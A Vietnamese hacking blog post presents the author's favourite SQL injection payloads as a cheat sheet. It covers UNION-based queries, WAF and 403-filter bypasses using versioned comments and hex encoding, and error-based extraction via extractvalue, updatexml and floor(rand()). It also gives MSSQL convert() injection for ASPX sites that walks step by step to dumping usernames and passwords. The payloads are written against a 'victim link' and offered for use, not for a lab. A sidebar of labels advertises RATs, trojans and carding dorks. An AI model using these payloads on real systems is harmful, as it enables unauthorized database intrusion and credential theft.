Phương Pháp Khai Thác SQLi và ASPX

Đây là các cách khai thác của tôi thường sử dụng nhất, tôi chia sẻ cho các bạn . SQLi Cơ Bản + Nâng Cao ------------------------------------...


Đây là các cách khai thác của tôi thường sử dụng nhất, tôi chia sẻ cho các bạn .


SQLi Cơ Bản + Nâng Cao
------------------------------------ ***Dạng Basic "and=0":
**Order lỗi : id=123 and=0 UNION SELECT 1,2-- -
Get table,column,data như bt thêm "and=0" sau id.
---------------------------------------------------------------------------
***********Dạng /*!Union*/ /*!Select*/ :
**Tìm Order lỗi :link victim+null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- - **Get database :link victim+ /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- -
**Get Colum:link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x+mã hex table-- -
**Get data :link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!tên cột,0x7c,tên cột,0x7c,tên cột,0x7c*/) from tên table-- -
-----------------------------------------------------------------
**********Bypass nâng cao dạng /*!Union*/ /*!Select*/ loại ẩn:
***Order lỗi : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- -
***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!tên cột,0x7c,tên cột,0x7c*/))),3 from table -- -
----------------------------------------------------------------
***************Dạng Bypass "=" chặn + ẩn :
***Order lỗi :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/+like+database()-- -
***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/+like+0x...()-- -
***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000tên cột,0x7c,tên cột,0x7c*/))),4 from table-- -
-----------------------------------------------------------------------
********************Dạng Bypass 403 limit ***(Khó)
+++Order lỗi :id=-1'+/*!50000union+select*/+1,2,3,4 -- -
+++Get table:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,table_name)+from+information_schema.tables+where+table_schema=database()+limit+1,1-- - ( Để biết thêm table tăng limit lên 1,1-2,1-3,1...)
+++Get column:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,column_name)+from+information_schema.columns+where+table_name=0x...+limit+1,1-- -(Tăng limit)
+++Get data :id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,tên cột,tên cột)+from+tên table -- -

--------------------------------------------------------------------------------------------

----------------------------------Bypass 403 limit ****(cực kì khó)*****
***Tìm order lỗi :id=-1+/*!50000union+select*/+1,2,3-- -
***Get table:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,table_name)))+from+/*!information_schema*/.tables+where+table_schema=database()+limit+0,1-- -
***Get column:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,column_name)))+from+/*!information_schema*/.columns+where+table_name=0x...+limit+0,1-- -
***Get data:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,tên cột,tên cột))*/)+from+tên table-- -
-------------------------------------------------------------------------
****Bypass Filter khó (1 order or nhiều order ) :
***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
Get Data:id=-1 Union Select group_concat(tên cột,0x7c,tên cột,0x7c) FrOm tên table-- -
------------------------------------------------------------------------
Dạng id=-1 order by ....-- - không tìm được Order lỗi thì Biến đổi thành id=1' order by
- rồi khai thác Bt.
~~~>K Get dk table thì id=-1' .... rồi khai thác BT.
***************Dạng Table ẩn (UnIoN SeLeCT):
**Order lỗi : id=-... UNION SELECT 1,2,3,...-- -
**Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Thay database() vào order lỗi ).
**Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- -(Thêm unhex(hex nếu table dạng ẩn )
**Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x mã hex table-- -
**Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tên cột,0x7c,tên cột,0x7c,tên cột))),4,5,6,7,8,9,10,11,12,13 from tên table-- -
-----------------------------------------
****************XPath Injection(erro base) :
1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- -
2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- -
3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0x"table" limit 0,1)))-- -
4.and extractvalue(rand(),concat(0x7c,(select concat("column",0x7c,"column") from "table" limit 0,1)))-- -
-------------------------------------------

***Dạng Bypass Xpath( Khó )
1.' and extractvalue(rand(),concat/*!(0x7c,version(),0x7c,database(),0x7c,user())*/)-- - 2.' and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,table_name) from /*!information_schema*/.tables where table_schema=database() limit 0,1)))-- -
3.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,column_name) from /*!information_schema*/.columns where table_name=0x"table" limit 0,1)))-- -
4.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!("column",0x7c,"column") from "table" limit 0,1))*/)-- -
-----------------------------------------
*****************XPath Injection(erro base Cao Cấp )
1.or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- -
2.and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
3.and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x... limit 0,1)),0)-- -
4.and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from tên table limit 0,1)),0)-- -
---------------------------------------------
++Khai thác SQL = Erro Base
http://demo-tainguyen.blogspot.com/…/khai-thac-error-based-…
++Khai thác SQL Blind :
http://ceh.vn/@4rum/showthread.php?tid=1203
++ sqli form search(tùy site)
'and p.published =-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=0x62635f7573657273-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(username,0x2f,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from bc_users-- -

ASPX Cơ Bản
+ Bước 1: and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
+ Bước 2: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')-- -
< not in (.....)-- -> viết lệnh tiếp để ra các table, có nghĩa là khi bạn có được "tbl" nào đó thì mình bỏ tiếp cái "tbl" đó vào để check cho nó xuất hiện "tbl" tiếp theo
+ Bước 3: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- -
=>> được thông số 'ID' tiếp
and 1=convert(int,(select top 1 column name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in('ID') ))-- -
được thông số 'username' tiếp
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID'),'username') ))-- -
được thông số password
+ Bước 4: Khai thác thông tin username và password:
username:
and 1=convert(int,(select top 1 username from tbl_DangNhap))-- -
passord:
and 1=convert(int,select top 1 password from tbl_DangNhap))-- -

COMMENTS

Tên

.:: Connect Trojan ::.,111,.htaccess,2,0-day,3,10000+ Latest Carding Dorks 2020 and 2021,1,2017,2,Add-on,16,Affiliate,1,Anotador,1,AutoIT,17,BackDoor,1,Bán Sách,13,banhangonline,1,Bảo Mật,216,Bất Động Sản Tại Tiền Giang,5,Bestsellers,13,Binder,1,blog,31,Blogger,4,Blogger Template,1,Botnet,3,Brute,1,Bug Bounty,1,Bypass,11,camera,1,ceh,1,Châu Tinh Trì,2,Checked,6,Chrome,21,Code,5,coin hive,1,Coin-Hive,2,CoinHive,1,Connect Trojan,342,Connect Trojan ::.,1,Cổ Tích,2,Crack,3,Crypto,5,CSRF,5,CSS,2,Cuộc Sống,1,Dau tu,8,DDoS,6,Designer,1,Dich vụ,1,DNS,4,Download,2,du-an,3,DVD LUMION Tiếng Việt của anh Dũng Già Pro,1,Đam Mỹ,1,điện,1,Đồ Họa,215,Đô Thị,16,e11.me,1,ebook,19,ebook free,296,eBook Phệ Hồn Nghịch Thiên,1,eBook Thịnh Thế Địch Phi,1,Encrypt,1,Encryption,1,epub,76,epub [Tiên hiệp],1,ET-Logger,1,exploit,23,Exploitation,1,Extractor,2,facebook,69,FireFox,15,Flood,2,Forensic,7,full prc,2,game,177,Gerador,3,Gerenciador,1,Get Root,3,GHDB,3,Giả Tưởng,1,giaitri,1,Google,15,H&Y Shop,2,Hacker,3,Hacking,16,Hacking and Security,6,Hacking Tools,36,Hành Động,3,He Thong Site Phim,25,Hijacking,6,Hình Sự,1,hivecoin.hive coin,1,Hỏi Xoáy Đáp Xoay Trên VTV3,1,HTML,1,https,1,Huyền Ảo,92,Hướng dẫn Internet cơ bản,1,IFTTT,703,Imgur,2,Infographic,1,Information Disclosure,1,Internet Explorer,3,IT News,39,J2TeaM,29,J2TeaM Tools,9,JavaScript,6,Javascript Injection,3,Juno_okyo's Blog,23,Khóa Học,61,Khóa Học kiếm tiền online với accesstrade,5,khoá học miễn phí,28,Khóa học Photoshop,19,Khóa học sử dụng mã độc và phòng chống mã độc,2,Khoa Huyễn,6,khuyến mãi,16,kiemhiep,9,Kiếm Hiệp,20,Kiếm Tiền MMO,40,kiếm tiền rút gọn link,1,KilerRat,1,Kinh Dị,24,Kinh Dị - Ma,4,Kinh Doanh,73,kinhdi,1,kinhdoanh,5,KRACK Attacks,1,Lãng mạn,1,lazada,1,Lắp đặt trọn gói camera tận nhà giá rẻ tại Gò Công,1,Lập trình,2,Lịch Sử,5,Linux,1,Local Attack,2,Logins/Cadastro,1,Lỗi Web,1,Lược Sử Hacker,2,Mã Giảm Giá,2,Mã Hóa,48,Malware,3,Master-Code,31,Máy Tính,1,Metasploit,2,Microsoft,4,mobile hacking,2,monero,1,Movie,25,MySQL,1,NEW PRODUCTS,19,NGHỆ THUẬT ẨN MÌNH,13,ngontinh,10,Ngôn Tình,151,nhà đất,1,Nhà Đất Gò Công,1,Nhân Vật Lịch Sử,2,Nhật Bản,1,Nhựt Trường Group,1,NjRat,5,Nước,1,open redirect,1,Oracle,1,Path Disclosure,2,pdf,76,Pen-Test,6,Pentest Box,9,Phan mem Internet,1,phanmem,23,phanmemdienthoai,3,phanmemmaytinh,10,phần mềm,12,Phim 18,2,Phim 2012,1,Phim 3D,1,Phim Âm Nhạc,2,Phim Bộ,39,Phim Chiến Tranh,5,Phim Dã Sử - Cổ Trang,6,Phim Đài Loan,6,Phim Đề Cử,4,Phim Hài Hước,26,Phim Hàn Quốc,33,Phim HD Chất Lượng Cao,5,Phim Hoạt Hình,2,Phim Hot,1,Phim Hồng Kông,20,Phim HQ,2,Phim Kinh Dị,8,Phim lẻ,4,Phim Mới 2011,2,Phim Mới 2012,1,Phim Mới 2015,1,Phim Nhật Bản,4,Phim SD,3,Phim Thái Lan,6,Phim Thần Thoại,4,Phim Tình Cảm,35,Phim Trung Quốc,37,Phim Truyền Hình,19,Phim Viễn Tưởng,1,Phim Võ Thuật,36,Phim Xã Hội Đen,1,Phishing,5,PHP,16,Plugin,1,Port,1,post mẫu,1,prc,77,Programming,15,Python,1,Quảng Cáo,1,rat,457,Recovery,3,Remote Code Execution,1,Remote Desktop,1,Reverse Engineering,6,review,3,rút gọn link,1,sach,49,Sách,42,Sách Nghệ Thuật Sống,12,sách nói,1,Sách Tâm Linh,1,Sách Tiếng Anh,2,sachiep,2,sachnoi,1,Sản Phẩm,1,Sắc Hiệp,16,Scam,1,Scanner,10,Security,66,SEO,5,share,1,Shell,5,shop,18,Social Engineering,4,Software,22,Source Unity,1,SQL injection,21,Sức Khỏe,1,Symlink,3,Tài Chính,1,Tài chính cá nhân,2,Tài Liệu,1,Tản mạn,7,Taudio,2,Tâm lý xã hội,1,tấn công,1,Testador,1,Thái Lan,2,Tham Khảo,3,thamkhao,11,them,1,Thiệp Cưới,1,Thiết Kế Web,34,Thời Trang,2,Thủ Thuật Hacking,53,Thuyết Minh,1,tienhiep,5,Tiên Hiệp,123,Tiểu Thuyết,94,tiki,3,TIL,8,Tin Tức,55,Tips,39,tool,3,Tool Hack,14,Tools,9,Tổng Hợp,1,Tricks,26,Trinh thám,1,trojan original,48,Trọng sinh,11,Trộm mộ,1,Trung Quốc,1,Truyện,3,Trương Định,110,Tu Chân,2,TUTORIALS,124,Twitter,1,Ung_Dung,4,Upload,1,usb,1,vanhoc,11,văn học,6,vBulletin,7,video,16,Vietsub,1,Việt Nam,4,Virus,4,Võ Thuật,3,Võng Du,5,Vulnerability,19,Web Developer,15,webmau,5,WHMCS,3,WiFi,2,wiki lỗi máy tinh,1,wiki lỗi NTG,3,Windows,12,WordPress,43,Write-up,11,XSS,16,Yahoo,1,yeah1offer,1,youtube,11,
ltr
item
NhutTruong.Com - Chia sẻ kiến thức miễn phí: Phương Pháp Khai Thác SQLi và ASPX
Phương Pháp Khai Thác SQLi và ASPX
https://3.bp.blogspot.com/-hr8nfxnMaoU/WBv7iDnEyDI/AAAAAAAANPs/Jgw_Drp_1pkFeOYJjJFqF4aepzXM4nq3ACPcB/s320/Untitled-1.png
https://3.bp.blogspot.com/-hr8nfxnMaoU/WBv7iDnEyDI/AAAAAAAANPs/Jgw_Drp_1pkFeOYJjJFqF4aepzXM4nq3ACPcB/s72-c/Untitled-1.png
NhutTruong.Com - Chia sẻ kiến thức miễn phí
https://www.nhuttruong.com/2016/11/phuong-phap-khai-thac-sqli-va-aspx.html
https://www.nhuttruong.com/
https://www.nhuttruong.com/
https://www.nhuttruong.com/2016/11/phuong-phap-khai-thac-sqli-va-aspx.html
true
7607280272436897486
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content